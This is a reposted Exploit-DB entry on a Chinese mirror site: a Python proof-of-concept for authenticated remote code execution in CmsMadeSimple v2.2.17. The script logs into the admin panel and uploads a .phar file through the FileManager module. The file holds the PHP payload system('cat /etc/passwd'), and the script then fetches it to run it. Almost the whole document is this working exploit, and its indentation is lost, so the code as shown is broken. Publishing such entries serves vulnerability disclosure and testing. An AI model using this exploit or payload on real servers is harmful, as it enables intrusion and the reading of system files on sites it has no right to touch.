CmsMadeSimple v2.2.17 – Remote Code Execution (RCE) - 体验盒子

作者： Mirabbas Ağalarov

日期： 2023-07-19

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/51600/

#Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution (RCE) 
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs:Remote Code Execution(RCE) 
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 


import requests

login_url = 'http://localhost/admin/login.php'
username=input('username = ') 
password=input('password = ') 


upload_url = 'http://localhost/admin/moduleinterface.php'

file_path = input("please phar file name but file must same directory with python file and file content : <?php echo system('cat /etc/passwd') ?>: ")
#phar file content """"<?php echo system('cat /etc/passwd') ?>"""""

login_data = {
'username': username,
'password': password,
'loginsubmit': 'Submit'
}


session = requests.Session()
response = session.post(login_url, data=login_data)


if response.status_code == 200:
print('Login account')
else:
print('Login promlem.')
exit()


files = {
'm1_files[]': open(file_path, 'rb')
}

data = {
'mact': 'FileManager,m1_,upload,0',
'__c': session.cookies['__c'],
'disable_buffer': '1'
}


response = session.post(upload_url, files=files, data=data)


if response.status_code == 200:
print('file upload')
rce_url=f"http://localhost/uploads/{file_path}"
rce=requests.get(rce_url)
print(rce.text)
else:
print('file not upload')